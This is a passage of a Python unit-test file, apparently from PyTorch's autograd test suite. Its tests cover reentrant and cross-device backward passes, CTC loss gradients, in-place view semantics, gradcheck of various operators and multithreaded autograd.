t4 = t1 * t1 t5 = TestAutograd.SimulateBackwardError.apply(t4) # Child gpu graph (much longer than parent graph). prev = t2 * t2 for i in range(10): prev = prev * t2 reentrant_root = prev class ReentrantFunc(Function): @staticmethod def forward(ctx, inp): return inp.clone() @staticmethod def backward(ctx, grad): # Reentrant backward in child will take much longer. reentrant_root.backward() return grad # Parent gpu graph. t6 = ReentrantFunc.apply(t3) t7 = t6 * t6 # Parent graph will error out first, while child graph will continue executing. with self.assertRaisesRegex(Exception, "Simulate error"): torch.autograd.backward([t5.sum(), t7.sum()]) # No grads should be accumulated since child graph will stop execution # after parent receives error. self.assertIsNone(t2.grad) self.assertIsNone(t1.grad) self.assertIsNone(t3.grad) @onlyCUDA def test_reentrant_parent_error_on_cpu(self, device): before = CudaMemoryLeakCheck.get_cuda_memory_usage() # Run as separate function so that gc can clean up everything when we # check for memory usage. self._test_reentrant_parent_error_on_cpu(device) # Wait for autograd thread to cleanup failed tasks. after = CudaMemoryLeakCheck.get_cuda_memory_usage() start = time.time() while before != after and time.time() - start < 30: time.sleep(0.1) after = CudaMemoryLeakCheck.get_cuda_memory_usage() self.assertEqual(before, after) # test for backward in https://github.com/pytorch/pytorch/issues/15511 def test_pdist_large(self, device): def func(x): return torch.pdist(x, p=2) # shape[0] should be able to be (roughly) arbitrarily large, but the kernel # is currently limited to smaller sizes (see issue above); this is just testing # a floor. shape = (1000, 1) x = torch.randn(shape, device=device).requires_grad_() output = torch.pdist(x, p=2) # just run a single backward, as gradcheck/gradgradcheck is expensive here output.sum().backward() def test_where_functional(self, device): x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True) y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True) cond = mask_not_all_zeros((5, 5)).to(device=device) def where(cond, x, y): return torch.where(cond, x, y) gradcheck(where, [cond, x, y], raise_exception=True) gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)]) x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True) y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True) gradcheck(where, [cond, x, y], raise_exception=True) gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)]) def test_where_scalar(self, device): x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True) scalar = 4. 
cond = mask_not_all_zeros((5, 5)).to(device=device) def where_scalar_first(cond, x): return torch.where(cond, scalar, x) def where_scalar_second(cond, x): return torch.where(cond, x, scalar) gradcheck(where_scalar_first, (cond, x)) gradgradcheck(where_scalar_first, (cond, x)) gradcheck(where_scalar_second, (cond, x)) gradgradcheck(where_scalar_second, (cond, x)) @skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message: https://github.com/pytorch/pytorch/issues/34870""") def test_ctc_loss(self, device): batch_size = 64 num_labels = 101 target_length = 15 gradcheck_input_size = 10 ZERO_NONE = 0 ZERO_SOME = 1 ZERO_ALL = 2 # input_length, vary_lengths, zero_lengths tests = [(150, False, ZERO_NONE), (150, True, ZERO_NONE), (50, True, ZERO_SOME), (50, True, ZERO_ALL)] if 'cuda' in device: tests += [(50, False, ZERO_NONE), (50, True, ZERO_NONE), (150, True, ZERO_SOME), (150, True, ZERO_ALL)] for input_length, vary_lengths, zero_mode in tests: targets = torch.randint(1, num_labels, (batch_size, target_length), device=device, dtype=torch.long) x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True) tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1, device=device) input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item() if vary_lengths or i == 0 else input_length) for i in range(batch_size)] if zero_mode == ZERO_ALL: target_lengths = [0 for _ in range(batch_size)] else: target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item() if vary_lengths else target_length) for _ in range(batch_size)] if zero_mode == ZERO_SOME: idxes = torch.randint(0, batch_size, (10,)) for i in idxes: target_lengths[i] = 0 def ctc_after_softmax(x): x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels] .view(input_length, batch_size, num_labels)) log_probs = torch.log_softmax(x_full, 2) return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths) gradcheck(ctc_after_softmax, [x]) @onlyCUDA @skipCUDAIfRocm @skipCUDAIfCudnnVersionLessThan(7600) def test_ctc_loss_cudnn(self, device): batch_size = 16 input_length = 30 num_labels = 101 target_length = 15 targets = torch.randint(1, num_labels, (batch_size * target_length,), device='cuda', dtype=torch.long) log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2) log_probs.requires_grad_() input_lengths = batch_size * [input_length] target_lengths = batch_size * [target_length] grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float) with torch.backends.cudnn.flags(enabled=False): loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none') grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out) loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32), input_lengths, target_lengths, reduction='none') self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn)) grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out) self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0) def test_leaky_relu_inplace_with_neg_slope(self, device): a = torch.tensor([-1., 1.], device=device, requires_grad=True) b = torch.nn.functional.leaky_relu_(a.clone(), -2) with self.assertRaisesRegex(RuntimeError, "call out-of-place version"): b.backward(torch.ones(2, device=device)) a = torch.tensor([-1., 1.], device=device, 
requires_grad=True) b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0) with self.assertRaisesRegex(RuntimeError, "call out-of-place version"): b.backward(torch.ones(2, device=device)) def test_leaky_relu_inplace_with_zero_slope(self, device): a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True) b = torch.nn.functional.leaky_relu_(a.clone(), 0.0) b.backward(torch.ones(3, device=device)) expected = torch.tensor([0., 0., 1.], device=device) self.assertEqual(a.grad, expected) @onlyOnCPUAndCUDA def test_elu_inplace_with_neg_alpha(self, device): a = torch.tensor([-1., 1.], device=device, requires_grad=True) b = torch.nn.functional.elu_(a.clone(), alpha=-2) with self.assertRaisesRegex(RuntimeError, "call out-of-place version"): b.backward(torch.ones(2, device=device)) a = torch.tensor([-1., 1.], device=device, requires_grad=True) b = torch.nn.functional.celu_(a.clone(), alpha=-2) with self.assertRaisesRegex(RuntimeError, "call out-of-place version"): b.backward(torch.ones(2, device=device)) @onlyCUDA def test_free_unneeded_tensor(self, device): x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True) m = torch.randn(1, 3, 1, 1, device=device) z = x.sum() base_mem = torch.cuda.memory_allocated() z = ((x + 2) * m).sum() end_mem = torch.cuda.memory_allocated() # In the end the memory usage should remain equal, because neither of # (x + 2) and ((x + 2) * m) should be kept alive for backward, while the # previous allocation of z had the same size as the current one. self.assertEqual(base_mem, end_mem) @onlyCUDA def test_pin_memory(self, device): x = torch.randn(2, 2, dtype=torch.double, requires_grad=True) self.assertEqual(x, x.pin_memory()) self.assertIsNot(x, x.pin_memory()) self.assertTrue(x.pin_memory().requires_grad) gradcheck(lambda x: x.pin_memory(), [x]) gradgradcheck(lambda x: x.pin_memory(), [x]) @skipCUDAIfRocm @onlyCUDA def test_profiler_emit_nvtx(self, device): # This test is not intended to ensure correctness of nvtx ranges. # That would require something a great deal more complex (you'd have to create a # profile in a subprocess, open it, and parse the sql somehow). # This test is merely intended to catch if emit_nvtx breaks on construction. 
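        # (The NVTX ranges emitted by emit_nvtx are only captured when the process
        #  runs under an NVIDIA profiler such as nvprof or Nsight Systems; without
        #  one, the test mostly verifies that the context managers can be entered.)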
        a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
        with torch.cuda.profiler.profile():
            with emit_nvtx():
                a.add(1.0)

    @onlyCUDA
    def test_rnn_backward_to_input_but_not_parameters(self, device):
        # this checks whether it is possible to not require
        # weight parameters, but require inputs, see #7722
        l = torch.nn.LSTM(2, 3).to(device)
        for p in l.parameters():
            p.requires_grad = False
        s = torch.randn(1, 1, 2, requires_grad=True, device=device)
        out, _ = l(s)
        out.sum().backward()
        self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)

    @onlyCUDA
    def test_lstmcell_backward_only_one_output_grad(self, device):
        # checks that undefined gradients don't hamper the backward
        # see #11872
        l = torch.nn.LSTMCell(2, 3).to(device).double()
        s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
        for i in range(2):
            out = l(s)[i]
            out.sum().backward()
            self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)

    def _test_rnn_mod(self, mod, inp):
        def flatten_out(mod, inp):
            out = mod(inp)
            return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
        gradcheckfunc = partial(flatten_out, mod)
        with torch.backends.cudnn.flags(enabled=False):
            gradcheck(gradcheckfunc, inp, check_batched_grad=False)
            gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)

        if inp.is_cuda and not TEST_WITH_ROCM:
            # Assert that we have good error message around unsupported CuDNN double backward
            # NB: we trigger double backward using .backward() instead of autograd.grad due to
            # https://github.com/pytorch/pytorch/issues/37874
            with torch.backends.cudnn.flags(enabled=True):
                result = gradcheckfunc(inp)
                result[0].sum().backward(create_graph=True)
                grad0 = next(mod.parameters()).grad
                with self.assertRaisesRegex(RuntimeError,
                                            "please disable the CuDNN backend temporarily"):
                    grad0.sum().backward()

                # Here we avoid the backward(create_graph=True) memory leak
                # described in https://github.com/pytorch/pytorch/issues/7343
                for param in mod.parameters():
                    param.grad = None
                inp.grad = None

    def test_LSTM_grad_and_gradgrad(self, device):
        hsize = 4
        inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
        for bias in [True, False]:
            mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
            self._test_rnn_mod(mod, inp)

    def test_GRU_grad_and_gradgrad(self, device):
        hsize = 4
        inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
        for bias in [True, False]:
            mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
            self._test_rnn_mod(mod, inp)

    def test_copysign_subgradient(self, device):
        # Input is 0.0
        x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
        y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
        out = torch.copysign(x, y)
        out.sum().backward()
        self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
        self.assertEqual(y.grad.tolist(), [0.0] * 3)

        # Input is -0.0
        x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
        y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
        out = torch.copysign(x, y)
        out.sum().backward()
        self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
        self.assertEqual(y.grad.tolist(), [0.0] * 3)

        # Other is 0.0
        x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
        y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
        out = torch.copysign(x, y)
        out.sum().backward()
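        # (For reference: copysign(x, y) == |x| * sign(y), and +0. counts as
        #  positive, so for y == 0. the derivative w.r.t. x is sign(x); that is why
        #  the assertions just below expect [-1., 0., 1.], with a 0. subgradient
        #  taken at x == 0.)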
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0]) self.assertEqual(y.grad.tolist(), [0.0] * 3) # Other is -0.0 x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True) y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True) out = torch.copysign(x, y) out.sum().backward() self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0]) self.assertEqual(y.grad.tolist(), [0.0] * 3) @deviceCountAtLeast(1) def test_grad_assignment(self, devices): x = torch.randn(5, 5, device=devices[0]) # Tests that the wrong shape raises with self.assertRaises(RuntimeError): x.grad = torch.randn(2, 2, device=devices[0]) # Tests that the wrong dtype raises with self.assertRaises(RuntimeError): x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0]) # Tests that self-assignment raises with self.assertRaises(RuntimeError): x.grad = x # Tests device -> cpu grad assignment raises if self.device_type != 'cpu': with self.assertRaises(RuntimeError): t_cpu = torch.rand(5, 5) t_cpu.grad = torch.randn(5, 5, device=devices[0]) # Tests half type on CUDA if self.device_type == 'cuda': x = x.to(dtype=torch.half, device=devices[0]) x.grad = torch.zeros_like(x) # Tests cross-device assignment raises if len(devices) > 1: x = torch.randn(5, 5, device=devices[0]) with self.assertRaises(RuntimeError): x.grad = torch.randn(5, 5, device=devices[1]) @deviceCountAtLeast(1) @dtypes(torch.float, torch.double) def test_requires_grad_factory(self, devices, dtype): fns = [torch.ones_like, torch.testing.randn_like] x = torch.randn(2, 3, dtype=dtype, device=devices[0]) for fn in fns: for requires_grad in [True, False]: output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad) self.assertEqual(requires_grad, output.requires_grad) self.assertIs(dtype, output.dtype) self.assertEqual(devices[0], str(x.device)) @deviceCountAtLeast(2) def test_unused_output_device(self, devices): from torch.nn.parallel._functions import Broadcast x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True) outputs = Broadcast.apply(list(range(len(devices))), x) y = outputs[-1] * 2 y.sum().backward() # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095 self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2) @deviceCountAtLeast(2) def test_backward_device(self, devices): # check that current device matches the variable's device device = [None] class Identity(torch.autograd.Function): @staticmethod def forward(ctx, x): return x.clone() @staticmethod def backward(ctx, grad_output): device[0] = grad_output.device return grad_output.clone() v = torch.randn(1, device=devices[1], requires_grad=True) Identity.apply(v).backward() self.assertEqual(str(device[0]), devices[1]) @deviceCountAtLeast(2) def test_inputbuffer_add_multidevice(self, devices): input = torch.randn(1, device=devices[0], requires_grad=True) output = input.to(device=devices[1]) + input.to(device=devices[1]) output.backward() @onlyCPU def test_copy_(self, device): # At the time of writing this test, copy_ is not generated from native_functions.yaml # there was a bug that bfloat16 was not recognized as floating. 
        x = torch.randn(10, device=device, requires_grad=True)
        floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
        for dt in floating_dt:
            y = torch.empty(10, device=device, dtype=dt)
            y.copy_(x)
            self.assertTrue(y.requires_grad)
            z = x.to(torch.bfloat16)
            self.assertTrue(z.requires_grad)

    @onlyCUDA
    def test_simple_reentrant_cross_device(self, device):
        class ReentrantFunc(Function):
            _cpu_mode = True

            @staticmethod
            def forward(ctx, x):
                return x * (x + 2)

            @staticmethod
            def backward(ctx, grad_output):
                with torch.enable_grad():
                    if ReentrantFunc._cpu_mode:
                        new_param = torch.randn(2, 2, requires_grad=True)
                        (new_param ** 2).sum().backward()
                    else:
                        new_param = torch.randn(2, 2, device=device, requires_grad=True)
                        (new_param ** 2).sum().backward()
                return grad_output

        # Reentrant starts on GPU thread, finishes on GPU thread
        x = torch.randn(2, 2, device=device, requires_grad=True)
        out = ReentrantFunc.apply(x)
        out.sum().backward()

        # Reentrant starts on CPU thread, finishes on GPU thread
        x = torch.randn(2, 2, requires_grad=True)
        # set ReentrantFunc node to GPU to emit tasks to GPU queue
        ReentrantFunc._cpu_mode = False
        out = ReentrantFunc.apply(x)
        out.sum().backward()

        # Reentrant starts on GPU thread, finishes on CPU thread
        x = torch.randn(2, 2, device=device, requires_grad=True)
        # set ReentrantFunc node to CPU to emit tasks to CPU queue
        ReentrantFunc._cpu_mode = True
        out = ReentrantFunc.apply(x)
        out.sum().backward()

    @onlyCUDA
    def test_cross_device_reentrant_autograd(self, device):
        # Output on gpu so that this task will be associated with the gpu thread
        def fn_on_gpu(inp):
            # Artificially increase the priority of the next op to make sure it runs
            # as soon as we reach it before the ops of branch1.
            dummy = inp * 2 * 2 * 2 * 2
            return inp.to(device=device)

        def parent_on_cpu(inp):
            # Slow branch of ops on gpu so that the work queue for the gpu thread
            # won't empty too quickly. They also have smaller priorities than the
            # ones created by fn_on_gpu
            branch1 = inp.to(device=device)
            branch1 = branch1 / branch1
            branch1 = branch1 / branch1
            branch1 = branch1 / branch1
            # Perform checkpoint on cpu tensors. So the last op performed in the reentrant
            # autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
            # So the cpu thread will notify the gpu thread with an empty NodeTask.
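            # (checkpoint below is presumably torch.utils.checkpoint.checkpoint: it
            #  re-runs fn_on_gpu under grad mode during the backward pass, which is
            #  what makes this backward re-entrant.)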
branch2 = checkpoint(fn_on_gpu, inp) out = branch2 + branch1 return out inp = torch.rand(2, requires_grad=True) out = parent_on_cpu(inp) # This will segfault if the empty NodeTask is not handled properly in the # gpu thread ReadyQueue out.sum().backward() def test_inplace_view_backprop_base(self, device): # modify view and back-prop through base root = torch.randn(2, 2, device=device, requires_grad=True) x = root.clone() v1 = x.narrow(0, 0, 1) v1.mul_(2) x.sum().backward() self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]]) def test_inplace_view_backprop_view_of_view(self, device): # modify view and backprop through view-of-view root = torch.randn(2, 2, device=device, requires_grad=True) x = root.clone() v1 = x.narrow(0, 0, 1) v2 = x.narrow(0, 0, 1) v1.mul_(2) v2.sum().backward() self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]]) def test_inplace_view_of_view(self, device): # modify view-of-view and backprop through base root = torch.randn(2, 2, device=device, requires_grad=True) x = root.clone() v1 = x.narrow(0, 0, 1) v2 = v1.narrow(1, 1, 1) v2.mul_(2) x.sum().backward() self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]]) def test_inplace_view_then_no_grad(self, device): # Perform an in-place operation on a view of a non-leaf variable. a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True) b = a * 2 c = b.view_as(b) c[0][0] = 3 # Force a graph update with grad disabled. with torch.no_grad(): c.grad_fn c.sum().backward() def test_inplace_view_gradcheck(self, device): # gradcheck modifications to views a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True) b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True) def func(root, b): x = root.clone() x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b) x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b) return x gradcheck(func, [a, b], raise_exception=True) go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True) gradgradcheck(func, (a, b), (go,)) def test_inplace_view_multiple_outputs(self, device): root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_() x = root.clone() v1 = x.unbind() with self.assertRaises(RuntimeError): v1[0].mul_(2) def test_inplace_view_of_multiple_output_view(self, device): a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone() b = a.unbind(0) c = b[0].view_as(b[0]) with self.assertRaises(RuntimeError): c.mul_(2) def test_inplace_multiple_output_view_of_view(self, device): a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone() b = a.view_as(a) c = b.unbind(0) with self.assertRaises(RuntimeError): c[0].mul_(2) def test_inplace_view_makes_base_require_grad(self, device): # in-place modification to view makes base require grad a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False) b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True) def func(root, b): x = root.clone() self.assertFalse(x.requires_grad) x.narrow(1, 2, 2).mul_(b) self.assertTrue(x.requires_grad) return x gradcheck(func, [a, b], raise_exception=True) go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True) gradgradcheck(func, (a, b), (go,)) def test_inplace_view_backprop_view(self, device): # modify view and backprop through view a = torch.tensor([2., 5.], device=device, requires_grad=False) b = torch.tensor([3.], device=device, requires_grad=True) res = a.narrow(0, 1, 1).mul_(b) res.sum().backward() self.assertEqual(b.grad.tolist(), [5]) 
self.assertIsNone(a.grad) def test_inplace_view_modify_base(self, device): # Test that an in-place operation on a base that forced it to require # grad also forces any previous views to require grad and backprop # correctly r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True) def fn(r): x = torch.ones(5, dtype=torch.double, device=device) v = x.select(0, 1) self.assertFalse(v.requires_grad) self.assertIsNone(v.grad_fn) x.add_(r) # v is now dependent on r due to the in-place op on x self.assertTrue(v.requires_grad) return v gradcheck(fn, [r]) gradgradcheck(fn, [r]) def test_inplace_view_python(self, device): # in-place modifications of Python-autograd created view a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True) b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True) class PyAdd(torch.autograd.Function): @staticmethod def forward(ctx, x, y): ctx.mark_dirty(x) x.add_(y) return x @staticmethod def backward(ctx, grad): return grad, grad def func(root, b): x = root.clone() PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b) PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b) return x gradcheck(func, [a, b], raise_exception=True) go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True) gradgradcheck(func, (a, b), (go,)) def test_inplace_view_non_contig(self, device): root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True) x = root.clone() v1 = x.narrow(0, 0, 1) v2 = v1.narrow(1, 1, 1) v2.mul_(2) x.sum().backward() self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]]) def test_inplace_view_multi_output_unsafe(self, device): for f in [lambda t: t.unsafe_split(1), lambda t: t.unsafe_split_with_sizes((1, 1, 1)), lambda t: t.unsafe_chunk(3)]: a = torch.randn(3, 3, device=device, requires_grad=True) b = a + a s1, s2, s3 = f(b) s1.mul_(s2) s1.sum().backward() def test_inplace_view_multi_output_safe(self, device): for f in [lambda t: t.split(1), lambda t: t.split_with_sizes((1, 1, 1)), lambda t: t.chunk(3)]: a = torch.randn(3, 3, device=device, requires_grad=True) b = a + a s1, s2, s3 = f(b) error_msg = 'This view is an output of a function that returns multiple views.' 
with self.assertRaisesRegex(RuntimeError, error_msg): s1.mul_(s2) def test_mv_grad_stride_0(self, device): # Reference: https://github.com/pytorch/pytorch/issues/38315 mat = torch.randn(2, 2, dtype=torch.double, device=device) vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True) def fn(vec): # Expand inside the function to make sure the input to # gradcheck does not have overlapping memory vec = vec.expand(2) return (mat @ vec).sum() gradcheck(fn, (vec)) gradgradcheck(fn, (vec)) @onlyCUDA def test_gradcheck_input_output_different_device(self, device): x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True) gradcheck(lambda x: x.to("cpu"), (x,)) x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True) gradcheck(lambda x: x.to("cuda"), (x,)) def test_logcumsumexp_large_value(self, device): a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True) with torch.no_grad(): # Large Number a[0] = 10000 gradcheck(lambda x: x.logcumsumexp(0), a) gradgradcheck(lambda x: x.logcumsumexp(0), a) gradcheck(lambda x: x.logcumsumexp(1), a) gradgradcheck(lambda x: x.logcumsumexp(1), a) gradcheck(lambda x: x.logcumsumexp(2), a) gradgradcheck(lambda x: x.logcumsumexp(2), a) @slowTest def test_lu_backward(self, device): def run_test(*sizes): x = torch.rand(*sizes, device=device, dtype=torch.double).requires_grad_(True) gradcheck(lambda x: x.lu(get_infos=True), x) gradgradcheck(lambda x: x.lu(get_infos=True), x) gradcheck(lambda x: x.lu(get_infos=False), x) gradgradcheck(lambda x: x.lu(get_infos=False), x) # there is no pivot-less LU factorization on CPU if x.device.type == 'cuda': gradcheck(lambda x: x.lu(pivot=False, get_infos=True), x) gradgradcheck(lambda x: x.lu(pivot=False, get_infos=True), x) gradcheck(lambda x: x.lu(pivot=False, get_infos=False), x) gradgradcheck(lambda x: x.lu(pivot=False, get_infos=False), x) run_test(3, 3) run_test(3, 3, 3) run_test(3, 3, 3, 3) run_test(5, 5) run_test(3, 5, 5) run_test(3, 3, 5, 5) def test_strided_leaf_grad_layout(self, device): # (1) If leaf is non-overlapping and dense, grad's layout should match its leaf. for fmt_a in (torch.contiguous_format, torch.channels_last): for fmt_b in (torch.contiguous_format, torch.channels_last): a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a) b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b) a.requires_grad_() b.requires_grad_() # checks (1) for broadcasted gradients a.sum().backward() self.assertEqual(a.grad.stride(), a.stride()) b.sum().backward() self.assertEqual(b.grad.stride(), b.stride()) # checks (1) for non-broadcasted gradients a.grad = None b.grad = None (a * b).sum().backward() self.assertEqual(a.grad.stride(), a.stride()) self.assertEqual(b.grad.stride(), b.stride()) # (2) If leaf isn't dense, checks that grads are rowmajor contiguous. 
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device)) c.requires_grad_() d = torch.rand((2, 2), device=device) # checks (2) for broadcasted gradients c.sum().backward() self.assertEqual(c.grad.stride(), (2, 1)) # checks (2) for non-broadcasted gradients c.grad = None (c * d).sum().backward() self.assertEqual(c.grad.stride(), (2, 1)) def _test_atleast(self, device, torch_fn): # 0-dim s = torch.tensor(0.5, dtype=torch.double, requires_grad=True) gradcheck(lambda x: torch_fn(x), s) gradgradcheck(lambda x: torch_fn(x), s) # 1-dim a = torch.rand(4, dtype=torch.double, requires_grad=True) gradcheck(lambda x: torch_fn(x), a) gradgradcheck(lambda x: torch_fn(x), a) # 2,3,4-dim b = torch.rand(4, 3, dtype=torch.double, requires_grad=True) c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True) d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True) input_tuple = (s, a, b, c, d) gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple) gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple) def test_atleast(self, device): self._test_atleast(device, torch.atleast_1d) self._test_atleast(device, torch.atleast_2d) self._test_atleast(device, torch.atleast_3d) def test_xlogy(self, device): def _tensor_tensor_helper(x, y): gradcheck(lambda x, y: torch.xlogy(x, y), (x, y)) gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y)) with torch.no_grad(): x = x.clone() x[torch.rand_like(x) > 0.5] = 0 gradcheck(lambda y: torch.xlogy(x, y), (y)) gradgradcheck(lambda y: torch.xlogy(x, y), (y)) shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4)) # For broadcastible shapes and scalar. for x_shape, y_shape in permutations(shapes, 2): x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True) y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True) _tensor_tensor_helper(x, y) _tensor_tensor_helper(y, x) gradcheck(lambda y: torch.xlogy(0, y), (y)) gradgradcheck(lambda y: torch.xlogy(0, y), (y)) gradcheck(lambda y: torch.xlogy(2, y), (y)) gradgradcheck(lambda y: torch.xlogy(2, y), (y)) gradcheck(lambda y: torch.xlogy(y, 2), (y)) gradgradcheck(lambda y: torch.xlogy(y, 2), (y)) # Different shape x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True) y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True) _tensor_tensor_helper(x, y) _tensor_tensor_helper(y, x) _tensor_tensor_helper(x, x) _tensor_tensor_helper(y, y) # Same shape x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True) y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True) _tensor_tensor_helper(x, y) _tensor_tensor_helper(y, x) _tensor_tensor_helper(x, x) _tensor_tensor_helper(y, y) class TestMultithreadAutograd(TestCase): def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None): threads = [] for _ in range(num_threads): p = threading.Thread(target=fn, args=(args)) p.start() threads.append(p) for p in threads: p.join() def test_simple_backward(self): # simple multithreaded backward that create threads in the beginning of training # and everything else is training separately, i.e. inputs, operations, etc. def train_fn(): x = torch.ones(5, 5, requires_grad=True) y = (x + 3) * (x + 4) * 0.5 y.sum().backward() self.assertEqual(x.grad, x + 3.5) self._run_py_multithread_fn(train_fn) def test_simple_backward_same_input(self): # simple multithreaded backward with only shared inputs (i.e. 
This is common # for things like Hogwild multithreaded training with multiple CPU threads) def train_fn_backward(x): y = (x + 3) * (x + 4) * 0.5 y.sum().backward() x = torch.ones(5, 5, requires_grad=True) self._run_py_multithread_fn(train_fn_backward, (x,)) # Since we are calling backward from multiple threads # and all threads share the same input, when we do backward # concurrently, different backwards will all accumulate to # the same .grad for each input, and the gradients should # be equal to num_threads * gradient self.assertEqual(x.grad, 10 * (x + 3.5)) def train_fn_grad(x): y = (x + 3) * (x + 4) * 0.5 grads = torch.autograd.grad(y.sum(), x) self.assertEqual(len(grads), 1) self.assertEqual(grads[0], x + 3.5) # since we use functional grad() api, gradients will not # be accumulate to the same place and should be the same self._run_py_multithread_fn(train_fn_grad, (x,)) def test_python_thread_in_middle(self): # User might write a network that starts on one CPU thread, then runs its second half # concurrently with other threads (either via python threading or fork/join calls), # then calls backward()/grad() on BOTH threads, like a Y pattern from input at the # bottom to output at the top. This way part of the GraphTask is being shared across # different threads and we need to ensure user specify retain_graph=True, otherwise # error out with the correct error message # Case 1: multiple backward with python threads, retain_graph=False # should throw error in some threads with no retain_graph. success_vs_raises = [0, 0] def train_fn_no_retain_graph(x): y = x + x ** 2 try: y.sum().backward() success_vs_raises[0] += 1 except RuntimeError as error: success_vs_raises[1] += 1 self.assertRegex(str(error), "Specify retain_graph=True") x_no_retain = torch.ones(5, 5, requires_grad=True) y_no_retain = x_no_retain + 